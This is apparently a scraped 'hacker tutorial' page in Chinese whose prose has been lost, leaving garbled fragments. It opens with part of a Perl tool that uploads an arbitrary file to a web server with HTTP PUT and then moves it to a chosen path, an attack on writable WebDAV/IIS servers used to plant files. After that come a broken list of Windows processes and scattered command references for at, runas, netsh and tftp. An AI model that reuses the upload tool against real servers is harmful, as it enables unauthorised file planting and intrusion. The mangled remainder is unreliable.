print "usage:$0 127.0.0.1 80 kaka.txt /scripts/my_file.txt\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$path = @ARGV[3];
$file = @ARGV[2];
@path=split("/",$path);
$any = pop(@path);
$path1=join("/",@path);
@s=stat("$file");
$size = $s[7];
print "$file size is $size bytes\n";
PeerAddr =>$host,

print $sock "PUT $path1/lanker.txt HTTP/1.1\n";
print $sock "Content-Length: $size\n\n";
open(FILE,"$file")|| die "Can't open $file";
binmode(FILE);
while (read(FILE,$char,1024)) {
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!\n" ;
}
else{
print "upfile faile!!!\n";
}
close $sock;
close FILE;
PeerAddr =>$host,
print $sock "MOVE $path1/lanker.txt HTTP/1.1\n";
print $sock "Destination:http://$host:$port$path\n\n\n\n";
@req = <$sock>;
if ($req[0]=~/20\d+|/){
print "Modifyfile Succeed!!!" ;
}
else{
print "upfile faile!!!";
}
close $sock;
28
1[system Idle Process]
: [system process] or [system process]

: Windows
: Windows

cpu CPU
CPU
2[alg.exe]
: alg or alg.exe
:
:
Internet Internet
3[csrss.exe]
: csrss or csrss.exe
: Client/Server Runtime Server Subsystem
:
Windows
: Win32 csrss /
csrss
Windows 16 MSDOS
4[ddhelp.exe]
: ddhelp or ddhelp.exe
: DirectDraw Helper
: DirectDraw Helper DirectX
Directx
5[dllhost.exe]
: dllhost or dllhost.exe
: DCOM DLL Host
: DCOM DLL Host COM DLL Windows

com dll dllhost cpu
8
6[explorer.exe]
: explorer or explorer.exe
:
: Windows Program Manager Windows Explorer
Windows
Shell
shell
windows
c d
explorer.exe
7[inetinfo.exe]
: inetinfo or inetinfo.exe
: IIS Admin Service Helper
: InetInfo Microsoft Internet Infomation Services (IIS)
Debug
IIS
inetinfo.exe
8[internat.exe]
: internat or internat.exe
: Input Locales
:
internat.exe
HKEY_USERS\.DEFAULT\Keyboard
Layout\Preload
internat.exe EN

EN
internat.exe internat
9[kernel32.dll]
: kernel32 or kernel32.dll
: Windows
: Windows
Kernel32
10[lsass.exe]
: lsass or lsass.exe
:
: Windows
IP
ISAKMP/Oakley (IKE) IP
winlogon
msgina.dll
lsass
shell windows
LDAP 3
1000 "AND"
Lsass.exe
30

11[mdm.exe]
: mdm or mdm.exe
: Machine Debug Manager
: Debug Microsoft Office
Microsoft
Script Editor
Mdm.exe (Debug)
fff 0 mdm.exe
fff CHK
?X
Mdm.exe
fff Mdm.exe
fff Ctrl+Alt+Del
Mdm Mdm.exe Mdm.exe(
C:\Windows\System ) Mdm.bak msconfig
Machine Debug Manager Mdm.exe
msconfig IE
5.X (Internet
) fff
12[mmtask.tsk]
: mmtask or mmtask.tsk
:
: Windows MIDI

13[mprexe.exe]
: mprexe or mprexe.exe
: Windows
: Windows
Windows 32
A-311 (Trojan.A-311.104)
mprexe.exe
14[msgsrv32.exe]
: msgsrv32 or msgsrv32.exe
: Windows
: Windows Windows
msgsrv32.exe win9x
msgsrv32.exe
15[mstask.exe]
: mstask or mstask.exe
: Windows
: Windows
win9X
16[regsvc.exe]
: regsvc or regsvc.exe
:
17[rpcss.exe]
: rpcss or rpcss.exe
: RPC Portmapper
: Windows RPC
RPC
()
98
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe
rsion\RunServices
"
"
"C:\WINDOWS\SYSTEM\RPCSS"
18[services.exe]
: services or services.exe
: Windows Service Controller
: Windows

%systemroot
%\system32\service.exe
19[smss.exe]
: smss or smss.exe
: Session Manager Subsystem
: MS-DOS
LPT1 COM Win32
Windows

WinlogonWin32Csrss.exe
Winlogon Csrss
smss.exe
20[snmp.exe]
: snmp or snmp.exe
: Microsoft SNMP Agent
: Windows SNMP
SNMP WinsockAPI
21[spool32.exe]
: spool32 or spool32.exe
: Printer Spooler
: Windows
22[spoolsv.exe]
: spoolsv or spoolsv.exe
: Printer Spooler Service
: Windows
spooler
23[stisvc.exe]
: stisvc or stisvc.exe
: Still Image Service
: Still Image Service
Windows
24[svchost.exe]
: svchost or svchost.exe
: Service Host Process
: Service Host Process .
Svchost.exe
Svhost.exe %systemroot%\system32
Svchost.exe
Svchost.exe
Svchost.exe
Svchost.exe
windows 2k 2 svchost
RPCSSRemote Procedure Call

svchost.exe windows XP
4
svchost.exe
windows 2003 server
25[taskmon.exe]
: taskmon or taskmon.exe
: Windows Task Optimizer
: windows
26[tcpsvcs.exe]
: tcpsvcs or tcpsvcs.exe
: TCP/IP Services
: TCP/IP Services Application TCP/IP Internet
27[winlogon.exe]
: winlogon or winlogon.exe
: Windows Logon Process
: Windows NT
winlogon CTRL+ALT+DEL
28[winmgmt.exe]
: winmgmt or winmgmt.exe
: Windows Management Service

: Windows Management Service Windows Management
Instrumentation data WMI)
winmgmt win2000
WinMgmt.exeCIM
Repository WMI
WMI
WinMgmt.exe Windows 2k/NT Windows
95/98 exe Windows 2k
WMI
Windows 2k SP2
29[system]
: system or system
: Windows System Process
: Microsoft Windows
Windows2k/XP
smss.execsrss.exewinlogon.exeservices.exelsass.exesvchost.
exe(
)spoolsv.exeexplorer.exeSystem Idle Process

Windows 9x
msgsrv32.exemprexe.exemmtask.tskkenrel32.dll
29
(1997 12 11 1997 12 30

()
()
()
()
()
()
()
()
()

()
()
()
()
()

()
()
()
()
()
()
()
()
()()()

黑客教程

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

黑客教程

Uploaded by

Copyright:

Available Formats

1

fdisk date label defrag

msd path share memmaker

help restore set time

dir *.* -> a.txt a.txt

winipcfg ME98 95 Windows XP

NetBIOS NetBIOS Nbtstat NetBIOS

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP

ren *.abc *.cba

ftp bat net telnet

-a [InetAddr] [-N IfaceAddr]

at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]

.exe .com .bat

OK 2 Each M 12:00 AM chkstor > check.file

at 14:45 c:\test.bat ^>c:\output.txt

at \\marketing 00:00 /every:5,10,15,20,25,30 archive

rsh [Host] [-l UserName] [-n] [Command]

tftp [-i] [Host] [{get | put}] [Source] [Destination]

NetBIOS NetBIOS Nbtstat NetBIOS

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP

TCPIPv6 UDPICMPv6 IPv6

[/showtrustlevels] [/trustlevel] /user:UserAccountName program

runas MMC "

runas MMC "

" Windows 2000

runas /user:localmachinename\administrator cmd

domain.microsoft.com user ""

runas /user:user@domain.microsoft.com "notepad my_file.txt"

runas /netonly /user:domain\username "command"

[Gateway] [metric Metric]] [if Interface]]

Windows 95 Windows 98 route

C:\Documents and Settings\Administrator>netsh

source = static addr =

192.168.0.5 mask = 255.255.255.0

set wins name = source = static addr = none

"7.bat" "netsh exec

-R RSVP test Che "

DHCP list DHCP

routing ip add/set ipiptunnel IP

routing ip add/delete/set/show persistentroute

routing ip add/delete/set/show preferenceforprotocol

routing ip add/delete/set/show scope

routing ip show protocol IP

routing ip nat add/delete/set/show interface

routing ip nat add/delete portmapping NAT

routing ip autodhcp set/show global DHCP

routing ip autodhcp set/show interface

routing ip dnsproxy set/show global DNS

routing ip dnsproxy set/show interface DNS

routing ip igmp set/show global IGMP

routing ip igmp show grouptable IGMP

routing ip igmp show ifstats IGMP

routing ip igmp show iftable IGMP

routing ip igmp show proxygrouptable IGMP

routing ip igmp show rasgrouptable

routing ip ospf set/show global OSPF

routing ip ospf show lsdb OSPF

routing ip rip set/show global IP RIP

routing ip rip add/delete acceptfilter

routing ip rip set/show flags IP RIP

routing ip rip show ifbinding IP

routing ipx add/set filter IPX

dir . -> a.txt a.txt

ren .abc .cba

dir . -> a.txt a.txt

ren .abc .cba